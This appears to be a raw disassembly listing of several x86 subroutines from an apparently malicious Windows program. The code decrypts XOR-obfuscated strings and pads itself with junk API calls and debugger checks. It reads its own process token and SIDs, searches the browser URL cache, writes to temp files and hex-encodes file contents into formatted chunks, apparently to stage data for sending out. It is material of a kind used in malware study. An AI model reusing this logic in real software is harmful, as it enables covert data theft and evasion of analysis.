; ---------------------------------------------------------------------------
loc_40501D: ; CODE XREF: sub_404EC6+1A2�j
call GetLastError
push 4 ; Size
push offset byte_447389 ; Src
call sub_404E2A
mov [ebp+var_24], eax
push [ebp+nSubAuthority] ; nSubAuthority
push [ebp+pSid] ; pSid
call GetSidSubAuthority ; GetSidSubAuthority
push dword ptr [eax]
mov edi, [ebp+var_24]
push edi ; LPCSTR
push [ebp+var_8] ; LPSTR
call wsprintfA ; wsprintfA
add esp, 14h
mov ebx, eax
call GetCurrentProcessId ; GetCurrentProcessId
add [ebp+var_C], ebx
mov eax, ebx
add eax, [ebp+var_8]
mov [ebp+var_8], eax
inc [ebp+nSubAuthority]
loc_405062: ; CODE XREF: sub_404EC6+155�j
mov eax, [ebp+var_10]
cmp [ebp+nSubAuthority], eax
jb short loc_40501D
pop edi
pop esi
pop ebx
leave
retn
sub_404EC6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40506F(LPSTR)
sub_40506F proc near ; CODE XREF: sub_405E88+239�p
var_19 = byte ptr -19h
ReturnLength = dword ptr -14h
var_10 = byte ptr -10h
var_B = byte ptr -0Bh
dwProcessId = dword ptr -8
hObject = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1Ch
push ebx
push esi
push edi
lea edi, [ebp+var_B]
lea esi, word_44228A
mov ecx, 3
rep movsb
call GetCurrentProcessId ; GetCurrentProcessId
mov [ebp+dwProcessId], eax
lea edi, [ebp+var_10]
lea esi, byte_44228D
mov ecx, 5
rep movsb
push [ebp+dwProcessId] ; dwProcessId
push 0 ; bInheritHandle
push 1F0FFFh ; dwDesiredAccess
call OpenProcess ; OpenProcess
mov ebx, eax
call GetVersion ; GetVersion
lea eax, [ebp+hObject]
push eax ; TokenHandle
push 0F00FFh ; DesiredAccess
push ebx ; ProcessHandle
call OpenProcessToken ; OpenProcessToken
call GetCurrentProcessId ; GetCurrentProcessId
push ebx ; hObject
call CloseHandle ; CloseHandle
mov eax, dword_442278
add eax, 3FF4h
push eax ; uBytes
push 40h ; uFlags
call LocalAlloc ; LocalAlloc
mov ebx, eax
lea eax, [ebp+ReturnLength]
push eax ; ReturnLength
mov eax, dword_442278
add eax, 3FF4h
push eax ; TokenInformationLength
push ebx ; TokenInformation
push 1 ; TokenInformationClass
push [ebp+hObject] ; TokenHandle
call GetTokenInformation ; GetTokenInformation
call GetVersion ; GetVersion
push [ebp+arg_0] ; LPSTR
push dword ptr [ebx] ; pSid
call sub_404EC6
add esp, 8
push ebx ; hMem
call LocalFree ; LocalFree
call IsDebuggerPresent ; IsDebuggerPresent
push [ebp+hObject] ; hObject
call CloseHandle ; CloseHandle
lea edi, [ebp+var_19]
lea esi, word_442292
mov ecx, 5
rep movsb
pop edi
pop esi
pop ebx
leave
retn
sub_40506F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_405138(void *Src, size_t Size)
sub_405138 proc near ; CODE XREF: sub_40523D+52�p
; sub_40523D+BD�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
Src = dword ptr 8
Size = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push eax
push esi
push edi
mov esi, [ebp+Size]
push esi ; Size
push [ebp+Src] ; Src
mov eax, dword_4422A0
lea eax, ds:4197B0h[eax]
push eax ; Dst
call memcpy ; memcpy
add esp, 0Ch
xor edi, edi
jmp short loc_405176
; ---------------------------------------------------------------------------
loc_40515F: ; CODE XREF: sub_405138+40�j
mov eax, dword_4422A0
add eax, edi
lea eax, ds:4197B0h[eax]
movsx edx, byte ptr [eax]
xor edx, 3Ch
mov [eax], dl
inc edi
loc_405176: ; CODE XREF: sub_405138+25�j
cmp edi, esi
jl short loc_40515F
mov [ebp+var_4], 365h
mov eax, dword_4422A0
add eax, esi
mov byte ptr dword_4197B0[eax], 0
xor edi, edi
mov edi, dword_4422A0
mov eax, edi
add eax, 2
add eax, esi
mov dword_4422A0, eax
cmp eax, 0DDFh
jle short loc_4051B2
and dword_4422A0, 0
loc_4051B2: ; CODE XREF: sub_405138+71�j
mov [ebp+var_8], 0E8h
lea eax, dword_4197B0[edi]
pop edi
pop esi
leave
retn
sub_405138 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_4051C3(LPCSTR lpFileName, LPCVOID lpBuffer, DWORD nNumberOfBytesToWrite)
sub_4051C3 proc near ; CODE XREF: sub_4061F7+526�p
; sub_4061F7+543�p
NumberOfBytesWritten= dword ptr -4
lpFileName = dword ptr 8
lpBuffer = dword ptr 0Ch
nNumberOfBytesToWrite= dword ptr 10h
push ebp
mov ebp, esp
push ecx
push esi
push edi
call GetCurrentThreadId ; GetCurrentThreadId
push 0 ; hTemplateFile
push 80h ; dwFlagsAndAttributes
push 4 ; dwCreationDisposition
push 0 ; lpSecurityAttributes
push 0 ; dwShareMode
push 0C0000000h ; dwDesiredAccess
push [ebp+lpFileName] ; lpFileName
call CreateFileA ; CreateFileA
mov edi, eax
call GetVersion ; GetVersion
cmp edi, 0FFFFFFFFh
jnz short loc_4051F8
xor eax, eax
jmp short loc_405239
; ---------------------------------------------------------------------------
loc_4051F8: ; CODE XREF: sub_4051C3+2F�j
mov esi, 3356h
sub esi, 0F1Dh
push 2 ; dwMoveMethod
push 0 ; lpDistanceToMoveHigh
push 0 ; lDistanceToMove
push edi ; hFile
call SetFilePointer ; SetFilePointer
call GetVersion ; GetVersion
push 0 ; lpOverlapped
lea eax, [ebp+NumberOfBytesWritten]
push eax ; lpNumberOfBytesWritten
push [ebp+nNumberOfBytesToWrite] ; nNumberOfBytesToWrite
push [ebp+lpBuffer] ; lpBuffer
push edi ; hFile
call WriteFile ; WriteFile
call GetCurrentThreadId ; GetCurrentThreadId
push edi ; hObject
call CloseHandle ; CloseHandle
call GetCurrentThreadId ; GetCurrentThreadId
xor eax, eax
inc eax
loc_405239: ; CODE XREF: sub_4051C3+33�j
pop edi
pop esi
leave
retn
sub_4051C3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40523D proc near ; CODE XREF: sub_4061F7+46F�p
var_2F5B = byte ptr -2F5Bh
var_2F58 = dword ptr -2F58h
var_2F53 = byte ptr -2F53h
var_2F52 = byte ptr -2F52h
var_2F4A = word ptr -2F4Ah
var_2F48 = byte ptr -2F48h
var_2F47 = byte ptr -2F47h
var_2F46 = word ptr -2F46h
Str2 = byte ptr -2F43h
var_1F44 = dword ptr -1F44h
var_1F40 = byte ptr -1F40h
Str1 = dword ptr -1F3Ch
var_1F38 = dword ptr -1F38h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 2F5Ch
call sub_40C6B8
push ebx
push esi
loc_40524C: ; DATA XREF: sub_440531�r
push edi
mov [ebp+var_2F46], 7B0Ch ; DATA XREF: sub_44053D�r
; sub_440549�r
inc [ebp+var_2F46] ; DATA XREF: sub_440555�r sub_440561�r
lea edi, [ebp+var_2F52] ; DATA XREF: sub_44056D�r
lea esi, dword_4422A8 ; DATA XREF: sub_440579�r sub_440585�r
movsd
movsd
push [ebp+arg_0] ; DATA XREF: sub_440591�r
lea eax, [ebp+Str2] ; DATA XREF: sub_44059D�r
loc_405274: ; DATA XREF: sub_4405A9�r
push eax
call sub_40C6D8 ; DATA XREF: sub_4405B5�r
mov [ebp+var_2F47], 33h ; DATA XREF: sub_4405C1�r
; sub_4405CD�r
add [ebp+var_2F47], 1 ; DATA XREF: sub_4405D9�r
push 1 ; Size
push offset byte_447387 ; Src
call sub_405138 ; DATA XREF: sub_4405E5�r
mov edi, 12h
sub edi, dword_44229C ; DATA XREF: sub_4405F1�r
push edi
push eax
lea edi, [ebp+Str2]
push edi
loc_4052A8: ; DATA XREF: sub_4406AD�r sub_4406B9�r
call sub_40181A
add esp, 14h
loc_4052B0: ; DATA XREF: sub_4406C5�r
mov edi, eax
mov [ebp+var_2F4A], di ; DATA XREF: sub_4406D1�r
; sub_4406DD�r
movzx eax, [ebp+var_2F4A] ; DATA XREF: sub_4406E9�r
loc_4052C0: ; DATA XREF: sub_4406F5�r sub_440701�r
cmp eax, 0FFFFh
jz short loc_4052D6
movzx eax, [ebp+var_2F4A] ; DATA XREF: sub_44070D�r
; sub_440719�r
mov [ebp+eax+Str2], 0 ; DATA XREF: sub_440725�r sub_440731�r
loc_4052D6: ; CODE XREF: sub_40523D+88�j
; DATA XREF: sub_44073D�r ...
mov [ebp+var_2F48], 22h
add [ebp+var_2F48], 90h ; DATA XREF: sub_440755�r
loc_4052E4: ; DATA XREF: sub_440761�r sub_44076D�r ...
mov [ebp+var_1F44], 1F40h
call GetLastError ; DATA XREF: sub_440785�r
push 3 ; DATA XREF: sub_440791�r
; Size
push offset byte_447383 ; DATA XREF: sub_44079D�r
; Src
call sub_405138
add esp, 8
lea edi, [ebp+var_1F44] ; DATA XREF: sub_4407A9�r
loc_405308: ; DATA XREF: sub_4407B5�r
push edi
lea edi, [ebp+var_1F40] ; DATA XREF: sub_4407C1�r
push edi
loc_405310: ; DATA XREF: sub_4407CD�r
push eax
call FindFirstUrlCacheEntryA ; DATA XREF: sub_4407D9�r
mov ebx, eax
loc_405318: ; DATA XREF: sub_4407E5�r
or eax, eax
jz loc_4053F9 ; DATA XREF: sub_4407F1�r
loc_405320: ; DATA XREF: sub_4407FD�r sub_440809�r
lea eax, [ebp+Str2]
push eax ; Str2
push [ebp+Str1] ; Str1
call _stricmp ; DATA XREF: sub_440815�r
add esp, 8 ; DATA XREF: sub_440821�r
or eax, eax
jnz short loc_40536B ; DATA XREF: sub_44082D�r
mov [ebp+var_2F53], 0CEh ; DATA XREF: sub_440839�r
loc_405340: ; DATA XREF: sub_440845�r sub_440851�r
sub [ebp+var_2F53], 68h
push [ebp+var_1F38] ; DATA XREF: sub_44085D�r sub_440869�r
push [ebp+arg_4]
loc_405350: ; DATA XREF: sub_440875�r sub_440881�r
call sub_40C6D8
lea edi, [ebp+var_2F5B] ; DATA XREF: sub_44088D�r
lea esi, dword_4422B0
movsd
movsd
xor eax, eax ; DATA XREF: sub_440899�r
inc eax
jmp loc_4053F9 ; DATA XREF: sub_4408A5�r
; ---------------------------------------------------------------------------
loc_40536B: ; CODE XREF: sub_40523D+FA�j
; sub_40523D:loc_4053F2�j
; DATA XREF: ...
mov [ebp+var_2F53], 1Dh
movzx eax, [ebp+var_2F53] ; DATA XREF: sub_4408C9�r
; sub_4408D5�r
imul eax, 42B9h ; DATA XREF: sub_4408E1�r
mov [ebp+var_2F53], al ; DATA XREF: sub_4408ED�r
; sub_4408F9�r
mov [ebp+var_1F44], 1F40h ; DATA XREF: sub_440905�r
; sub_440911�r
lea eax, [ebp+var_1F44] ; DATA XREF: sub_44091D�r
; sub_440929�r
push eax
lea eax, [ebp+var_1F40] ; DATA XREF: sub_440935�r
push eax
push ebx
call FindNextUrlCacheEntryA ; FindNextUrlCacheEntryA
or eax, eax
jz short loc_4053F7
call IsDebuggerPresent ; IsDebuggerPresent
lea eax, [ebp+Str2]
push eax ; Str2
push [ebp+Str1] ; Str1
call _stricmp ; _stricmp
add esp, 8
or eax, eax
jnz short loc_4053F2
mov [ebp+var_2F58], 6518h
mov eax, [ebp+var_2F58]
mov edx, eax
add edx, eax
mov [ebp+var_2F58], edx
push [ebp+var_1F38]
push [ebp+arg_4]
call sub_40C6D8
xor eax, eax
inc eax
jmp short loc_4053F9
; ---------------------------------------------------------------------------
loc_4053F2: ; CODE XREF: sub_40523D+186�j
jmp loc_40536B
; ---------------------------------------------------------------------------
loc_4053F7: ; CODE XREF: sub_40523D+168�j
xor eax, eax
loc_4053F9: ; CODE XREF: sub_40523D+DD�j
; sub_40523D+129�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_40523D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_4053FE(LPCSTR lpString)
sub_4053FE proc near ; CODE XREF: sub_4054C8+602�p
var_14 = dword ptr -14h
Format = dword ptr -10h
Dest = dword ptr -0Ch
var_8 = dword ptr -8
var_2 = word ptr -2
lpString = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
push ebx
push esi
push edi
mov ebx, [ebp+lpString]
call IsDebuggerPresent ; IsDebuggerPresent
push ebx ; lpString
call lstrlenA ; lstrlenA
mov [ebp+var_8], eax
call GetTickCount ; GetTickCount
mov edi, [ebp+var_8]
shl edi, 1
add edi, 8
push edi ; uBytes
push 40h ; uFlags
call LocalAlloc ; LocalAlloc
mov [ebp+Dest], eax
call GetProcessHeap ; GetProcessHeap
xor esi, esi
jmp short loc_40544F
; ---------------------------------------------------------------------------
loc_405439: ; CODE XREF: sub_4053FE+54�j
movzx eax, byte ptr [ebx+esi]
xor eax, 71h
or eax, eax
jz short loc_40544E
movzx eax, byte ptr [ebx+esi]
xor eax, 71h
mov [ebx+esi], al
loc_40544E: ; CODE XREF: sub_4053FE+44�j
inc esi
loc_40544F: ; CODE XREF: sub_4053FE+39�j
cmp esi, [ebp+var_8]
jb short loc_405439
mov [ebp+var_2], 0
jmp short loc_4054B2
; ---------------------------------------------------------------------------
loc_40545C: ; CODE XREF: sub_4053FE+BB�j
push 6 ; Size
push offset dword_44737C ; Src
call sub_405138
mov [ebp+Format], eax
movzx edi, [ebp+var_2]
movzx edi, byte ptr [ebx+edi]
mov eax, edi
mov ecx, 1Ah
cdq
idiv ecx
mov esi, edx
add esi, 61h
push esi
mov eax, edi
mov ecx, 1Ah
mov edx, 4EC4EC4Fh
mul edx
shr edx, 3
mov [ebp+var_14], edx
mov edi, edx
add edi, 61h
push edi
mov edi, [ebp+Dest]
push edi
mov esi, [ebp+Format]
push esi ; Format
push edi ; Dest
call sprintf ; sprintf
add esp, 1Ch
inc [ebp+var_2]
loc_4054B2: ; CODE XREF: sub_4053FE+5C�j
movzx eax, [ebp+var_2]
cmp eax, [ebp+var_8]
jb short loc_40545C
call GetTickCount ; GetTickCount
mov eax, [ebp+Dest]
pop edi
pop esi
pop ebx
leave
retn
sub_4053FE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_4054C8(LPSTR lpFileName, int, int, LPCSTR lpString, int, int, int, int)
sub_4054C8 proc near ; CODE XREF: sub_4061F7+199�p
var_300A1 = byte ptr -300A1h
var_300A0 = dword ptr -300A0h
var_3009C = dword ptr -3009Ch
var_30096 = word ptr -30096h
var_30094 = dword ptr -30094h
var_3008D = byte ptr -3008Dh
var_3008C = dword ptr -3008Ch
var_30088 = dword ptr -30088h
Format = dword ptr -30084h
var_30080 = dword ptr -30080h
var_3007C = dword ptr -3007Ch
var_30078 = dword ptr -30078h
var_30071 = byte ptr -30071h
var_3006E = word ptr -3006Eh
var_3006C = byte ptr -3006Ch
var_30067 = byte ptr -30067h
var_30064 = byte ptr -30064h
var_3005F = dword ptr -3005Fh
var_3005B = byte ptr -3005Bh
var_30058 = dword ptr -30058h
var_30054 = byte ptr -30054h
var_30051 = byte ptr -30051h
var_3004A = word ptr -3004Ah
var_30048 = dword ptr -30048h
var_30044 = word ptr -30044h
var_30041 = byte ptr -30041h
var_30040 = byte ptr -30040h
var_3003F = byte ptr -3003Fh
var_30035 = byte ptr -30035h
var_30034 = dword ptr -30034h
var_30030 = dword ptr -30030h
var_3002C = byte ptr -3002Ch
var_3002B = byte ptr -3002Bh
var_30021 = byte ptr -30021h
hObject = dword ptr -30020h
var_3001C = dword ptr -3001Ch
var_30018 = word ptr -30018h
var_30016 = word ptr -30016h
var_30014 = dword ptr -30014h
hMem = dword ptr -30010h
String = byte ptr -3000Ch
NumberOfBytesWritten= dword ptr -2000Ch
Dest = dword ptr -20008h
Source = byte ptr -20003h
var_10004 = dword ptr -10004h
Dst = byte ptr -10000h
lpFileName = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
lpString = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
mov eax, 300A4h
call sub_40C6B8
push ebx
push esi
push edi
mov [ebp+var_30016], 316Dh
movzx eax, [ebp+var_30016]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_30016], ax
and [ebp+var_3001C], 0
call GetCurrentThreadId ; GetCurrentThreadId
and [ebp+NumberOfBytesWritten], 0
and [ebp+var_30014], 0
lea eax, [ebp+var_10004]
push eax ; int
push [ebp+arg_4] ; lpFileName
call sub_401A7E
add esp, 8
mov ebx, eax
mov ax, word_4422B8
mov [ebp+var_3004A], ax
mov eax, [ebp+var_10004]
or eax, eax
jz short loc_405543
or ebx, ebx
jz short loc_405543
cmp [ebp+arg_14], eax
jb short loc_405571
loc_405543: ; CODE XREF: sub_4054C8+70�j
; sub_4054C8+74�j
mov byte ptr [ebp+var_30078+3], 6Fh
add byte ptr [ebp+var_30078+3], 1
push ebx ; hMem
call LocalFree ; LocalFree
mov word ptr [ebp+var_30078], 52A5h
inc word ptr [ebp+var_30078]
mov [ebp+var_3001C], 1
loc_405571: ; CODE XREF: sub_4054C8+79�j
push [ebp+lpString] ; lpString
call lstrlenA ; lstrlenA
mov [ebp+var_30078], eax
mov eax, 64h
mul [ebp+var_10004]
mov [ebp+var_3007C], eax
mov edi, [ebp+var_30078]
imul edi, [ebp+var_30078], 32h
mov esi, [ebp+var_3007C]
lea edi, [esi+edi+1000h]
push edi ; uBytes
push 40h ; uFlags
call LocalAlloc ; LocalAlloc
mov [ebp+Dest], eax
call GetCurrentProcessId ; GetCurrentProcessId
lea edi, [ebp+var_30051]
lea esi, word_4422BA
mov ecx, 7
rep movsb
lea edi, [ebp+var_30054]
lea esi, byte_4422C1
mov ecx, 3
rep movsb
push [ebp+lpFileName] ; lpBuffer
push 104h ; nBufferLength
call GetTempPathA ; GetTempPathA
call GetProcessHeap ; GetProcessHeap
mov eax, [ebp+lpFileName]
mov [ebp+var_30080], eax
mov ecx, eax
or eax, 0FFFFFFFFh
loc_405603: ; CODE XREF: sub_4054C8+140�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_405603
mov edi, eax
mov esi, 19h
sub esi, dword_44229C
push esi
mov esi, [ebp+var_30080]
add esi, edi
push esi
call sub_40172F
add esp, 8
call GetVersion ; GetVersion
push 4 ; Size
push offset byte_447377 ; Src
call sub_405138
add esp, 8
push eax ; Source
push [ebp+lpFileName] ; Dest
call strcat ; strcat
add esp, 8
mov eax, dword_4422C4
mov [ebp+var_30058], eax
push 6 ; Size
push offset dword_447370 ; Src
call sub_405138
add esp, 8
push eax ; Source
push [ebp+Dest] ; Dest
call sub_40481B
add esp, 8
lea edi, [ebp+var_3005B]
lea esi, byte_4422C8
mov ecx, 3
rep movsb
push 6 ; Size
push offset byte_447369 ; Src
call sub_405138
add esp, 8
push eax ; Source
push [ebp+Dest] ; Dest
call sub_40481B
add esp, 8
mov eax, dword_4422CB
mov [ebp+var_3005F], eax
push 13h ; Size
push offset byte_447355 ; Src
call sub_405138
add esp, 8
push [ebp+arg_1C]
push offset word_447346
push eax ; Format
lea edi, [ebp+Source]
push edi ; Dest
call sprintf ; sprintf
add esp, 10h
lea eax, [ebp+Source]
push eax ; Source
push [ebp+Dest] ; Dest
call sub_40481B
add esp, 8
push 7 ; Size
push offset word_44733E ; Src
call sub_405138
add esp, 8
push eax ; Source
push [ebp+Dest] ; Dest
call sub_40481B
add esp, 8
mov [ebp+var_30021], 51h
sub [ebp+var_30021], 7Ch
push 6 ; Size
push offset byte_447337 ; Src
call sub_405138
add esp, 8
push eax ; Source
push [ebp+Dest] ; Dest
call sub_40481B
add esp, 8
call GetTickCount ; GetTickCount
lea edi, [ebp+var_30064]
lea esi, a70cg ; "70cg"
mov ecx, 5
rep movsb
push 5 ; Size
push offset byte_447331 ; Src
call sub_405138
add esp, 8
mov [ebp+Format], eax
call rand ; rand
mov ecx, 3E8h
cdq
idiv ecx
push edx
mov edi, [ebp+Format]
push [ebp+Format] ; Format
lea edi, [ebp+var_3002B]
push edi ; Dest
call sprintf ; sprintf
add esp, 0Ch
call IsDebuggerPresent ; IsDebuggerPresent
push 2Ah ; Size
push offset word_447306 ; Src
call sub_405138
add esp, 8
lea edi, [ebp+var_3002B]
push edi
push [ebp+arg_8]
push eax ; Format
lea edi, [ebp+Source]
push edi ; Dest
call sprintf ; sprintf
add esp, 10h
call GetTickCount ; GetTickCount
lea eax, [ebp+Source]
push eax ; Source
push [ebp+Dest] ; Dest
call sub_40481B
add esp, 8
mov [ebp+var_3002C], 0CAh
movzx eax, [ebp+var_3002C]
imul eax, 1107h
mov [ebp+var_3002C], al
push 2Dh ; Size
push offset dword_4472D8 ; Src
call sub_405138
add esp, 8
mov [ebp+var_30088], eax
call rand ; rand
mov ecx, 9
cdq
idiv ecx
mov edi, edx
add edi, 14h
push edi
mov edi, [ebp+var_30088]
push [ebp+var_30088] ; Format
lea edi, [ebp+Source]
push edi ; Dest
call sprintf ; sprintf
add esp, 0Ch
call IsDebuggerPresent ; IsDebuggerPresent
lea eax, [ebp+Source]
push eax ; Source
push [ebp+Dest] ; Dest
call sub_40481B
add esp, 8
mov [ebp+var_30030], 7FDh
add [ebp+var_30030], 38E3h
cmp [ebp+var_3001C], 0
jnz loc_405B6E
call GetCurrentProcessId ; GetCurrentProcessId
cmp [ebp+arg_18], 0
jz loc_4059C5
lea edi, [ebp+var_3008D]
lea esi, byte_4422D4
xor ecx, ecx
inc ecx
rep movsb
and [ebp+var_3008C], 0
jmp loc_4059A8
; ---------------------------------------------------------------------------
loc_405896: ; CODE XREF: sub_4054C8+4EC�j
call IsDebuggerPresent ; IsDebuggerPresent
mov [ebp+Dst], 0
mov ax, word_4422D5
mov [ebp+var_30096], ax
and [ebp+var_30094], 0
jmp loc_40594A
; ---------------------------------------------------------------------------
loc_4058BB: ; CODE XREF: sub_4054C8+48C�j
call GetCurrentProcessId ; GetCurrentProcessId
mov eax, [ebp+var_3008C]
add eax, [ebp+var_30094]
cmp eax, [ebp+var_10004]
jnb loc_40595A
push 6 ; Size
push offset dword_44737C ; Src
call sub_405138
mov [ebp+var_3009C], eax
mov edi, [ebp+var_3008C]
add edi, [ebp+var_30094]
movzx edi, byte ptr [ebx+edi]
mov eax, edi
mov ecx, 1Ah
cdq
idiv ecx
mov esi, edx
add esi, 61h
push esi
mov eax, edi
mov ecx, 1Ah
mov edx, 4EC4EC4Fh
mul edx
shr edx, 3
mov [ebp+var_300A0], edx
mov edi, edx
add edi, 61h
push edi
lea edi, [ebp+Dst]
push edi
mov edi, [ebp+var_3009C]
push edi ; Format
lea edi, [ebp+Dst]
push edi ; Dest
call sprintf ; sprintf
add esp, 1Ch
inc [ebp+var_30094]
loc_40594A: ; CODE XREF: sub_4054C8+3EE�j
cmp [ebp+var_30094], 80h
jb loc_4058BB
loc_40595A: ; CODE XREF: sub_4054C8+40A�j
push 30h ; Size
push offset byte_4472A7 ; Src
call sub_405138
push [ebp+NumberOfBytesWritten]
push [ebp+arg_10]
lea edi, [ebp+Dst]
push edi
push eax ; Format
lea edi, [ebp+Source]
push edi ; Dest
call sprintf ; sprintf
lea eax, [ebp+Source]
push eax ; Source
push [ebp+Dest] ; Dest
call sub_40481B
add esp, 24h
add [ebp+var_3008C], 80h
inc [ebp+NumberOfBytesWritten]
loc_4059A8: ; CODE XREF: sub_4054C8+3C9�j
mov eax, [ebp+var_10004]
cmp [ebp+var_3008C], eax
jb loc_405896
mov [ebp+var_30014], eax
jmp loc_405B6E
; ---------------------------------------------------------------------------
loc_4059C5: ; CODE XREF: sub_4054C8+3AB�j
call IsDebuggerPresent ; IsDebuggerPresent
mov eax, [ebp+arg_14]
mov [ebp+var_10004], eax
jmp loc_405B4A
; ---------------------------------------------------------------------------
loc_4059D8: ; CODE XREF: sub_4054C8+6A0�j
call GetCurrentProcessId ; GetCurrentProcessId
cmp [ebp+Dst], 0
jz loc_405B4A
mov byte ptr [ebp+var_3008C+2], 9Fh
sub byte ptr [ebp+var_3008C+2], 36h
mov eax, [ebp+arg_14]
add eax, 0C800h
cmp [ebp+var_10004], eax
jnb loc_405B6E
lea edi, [ebp+var_3009C+3]
lea esi, byte_4422D7
mov ecx, 7
rep movsb
mov eax, [ebp+var_10004]
mov [ebp+var_30014], eax
push 3 ; Size
push offset off_4472A3 ; Src
call sub_405138
push [ebp+lpString]
push eax ; Format
lea edi, [ebp+String]
push edi ; Dest
call sprintf ; sprintf
add esp, 14h
lea edi, [ebp+var_300A1]
lea esi, word_4422DE
movsd
movsd
lea ecx, [ebp+String]
or eax, 0FFFFFFFFh
loc_405A61: ; CODE XREF: sub_4054C8+59E�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_405A61
mov edi, eax
mov word ptr [ebp+var_30094+2], di
mov word ptr [ebp+var_3008C], 45ACh
movzx eax, word ptr [ebp+var_3008C]
imul eax, 6B72h
mov word ptr [ebp+var_3008C], ax
lea eax, [ebp+Dst]
push eax
movzx eax, word ptr [ebp+var_30094+2]
lea eax, [ebp+eax+String]
push eax
call sub_40C6D8
mov byte ptr [ebp+var_3008C+3], 0DBh
movzx eax, byte ptr [ebp+var_3008C+3]
mov edx, eax
add edx, eax
mov eax, edx
mov byte ptr [ebp+var_3008C+3], al
lea eax, [ebp+String]
push eax ; lpString
call sub_4053FE
add esp, 4
mov [ebp+hMem], eax
push 30h ; Size
push offset byte_4472A7 ; Src
call sub_405138
add esp, 8
push [ebp+NumberOfBytesWritten]
push [ebp+arg_10]
push [ebp+hMem]
push eax ; Format
lea edi, [ebp+Source]
push edi ; Dest
call sprintf ; sprintf
add esp, 14h
call GetCurrentThreadId ; GetCurrentThreadId
lea eax, [ebp+Source]
push eax ; Source
push [ebp+Dest] ; Dest
call sub_40481B
add esp, 8
mov dword ptr [ebp-30090h], 472Eh
add dword ptr [ebp-30090h], 7A98h
push [ebp+hMem] ; hMem
call LocalFree ; LocalFree
call GetProcessHeap ; GetProcessHeap
inc [ebp+NumberOfBytesWritten]
loc_405B4A: ; CODE XREF: sub_4054C8+50B�j
; sub_4054C8+51C�j
lea eax, [ebp+Dst]
push eax ; Dst
push [ebp+var_10004] ; int
push ebx ; int
call sub_401BB7
add esp, 0Ch
mov [ebp+var_10004], eax
or eax, eax
jnz loc_4059D8
loc_405B6E: ; CODE XREF: sub_4054C8+39C�j
; sub_4054C8+4F8�j ...
push 1Eh ; Size
push offset dword_447284 ; Src
call sub_405138
push eax ; Source
push [ebp+Dest] ; Dest
call sub_40481B
mov [ebp+var_30034], 2A8Eh
add [ebp+var_30034], 6CB3h
push 7 ; Size
push offset dword_44727C ; Src
call sub_405138
push eax ; Source
push [ebp+Dest] ; Dest
call sub_40481B
call GetVersion ; GetVersion
push 8 ; Size
push offset byte_447273 ; Src
call sub_405138
push eax ; Source
push [ebp+Dest] ; Dest
call sub_404529
mov [ebp+var_30035], 15h
add [ebp+var_30035], 2Fh
lea edi, [ebp+var_30067]
lea esi, word_4422E6
mov ecx, 3
rep movsb
push 6 ; Size
push offset dword_44726C ; Src
call sub_405138
mov [ebp+var_3008C], eax
call rand ; rand
mov [ebp-30090h], eax
call rand ; rand
mov ecx, 63h
cdq
idiv ecx
push edx
mov edi, [ebp-30090h]
mov eax, edi
mov ecx, 14h
cdq
idiv ecx
mov edi, edx
add edi, 61h
push edi
mov edi, [ebp+var_3008C]
push edi ; Format
lea edi, [ebp+var_3003F]
push edi ; Dest
call sprintf ; sprintf
mov [ebp+var_30018], 0F6Ah
movzx eax, [ebp+var_30018]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_30018], ax
push 0Eh ; Size
push offset byte_44725D ; Src
call sub_405138
lea edi, [ebp+var_3003F]
push edi
push eax ; Format
lea edi, [ebp+Source]
push edi ; Dest
call sprintf ; sprintf
lea eax, [ebp+Source]
push eax ; Source
push [ebp+Dest] ; Dest
call sub_404529
mov [ebp+var_30040], 95h
add [ebp+var_30040], 1
push 15h ; Size
push offset byte_447247 ; Src
call sub_405138
lea edi, [ebp+var_3002B]
push edi
push eax ; Format
lea edi, [ebp+Source]
push edi ; Dest
call sprintf ; sprintf
lea edi, [ebp+var_3006C]
lea esi, byte_4422E9
mov ecx, 5
rep movsb
lea eax, [ebp+Source]
push eax ; Source
push [ebp+Dest] ; Dest
call sub_404529
call GetCurrentThreadId ; GetCurrentThreadId
push 1 ; Size
push offset byte_447245 ; Src
call sub_405138
push eax ; Source
push [ebp+Dest] ; Dest
call sub_404529
mov ax, word_4422EE
mov [ebp+var_3006E], ax
push 16h ; Size
push offset word_44722E ; Src
call sub_405138
mov [ebp+var_30094], eax
call rand ; rand
mov ecx, 3E8h
cdq
idiv ecx
mov edi, edx
add edi, 2710h
push edi
lea edi, [ebp+var_3003F]
push edi
mov edi, [ebp+var_30094]
push edi ; Format
lea edi, [ebp+Source]
push edi ; Dest
call sprintf ; sprintf
call GetLastError
lea eax, [ebp+Source]
push eax ; Source
push [ebp+Dest] ; Dest
call sub_404529
mov [ebp+var_30041], 97h
add [ebp+var_30041], 3Eh
push 9 ; Size
push offset dword_447224 ; Src
call sub_405138
push eax ; Source
push [ebp+Dest] ; Dest
call sub_40481B
lea edi, [ebp+var_30071]
lea esi, byte_4422F0
mov ecx, 3
rep movsb
push 7 ; Size
push offset dword_44721C ; Src
call sub_405138
push eax ; Source
push [ebp+Dest] ; Dest
call sub_40481B
call GetCurrentThreadId ; GetCurrentThreadId
push 7 ; Size
push offset dword_447214 ; Src
call sub_405138
push eax ; Source
push [ebp+Dest] ; Dest
call strcat ; strcat
call GetTickCount ; GetTickCount
push [ebp+lpFileName]
call sub_40341E
add esp, 0E4h
mov [ebp+var_30044], 4FFDh
inc [ebp+var_30044]
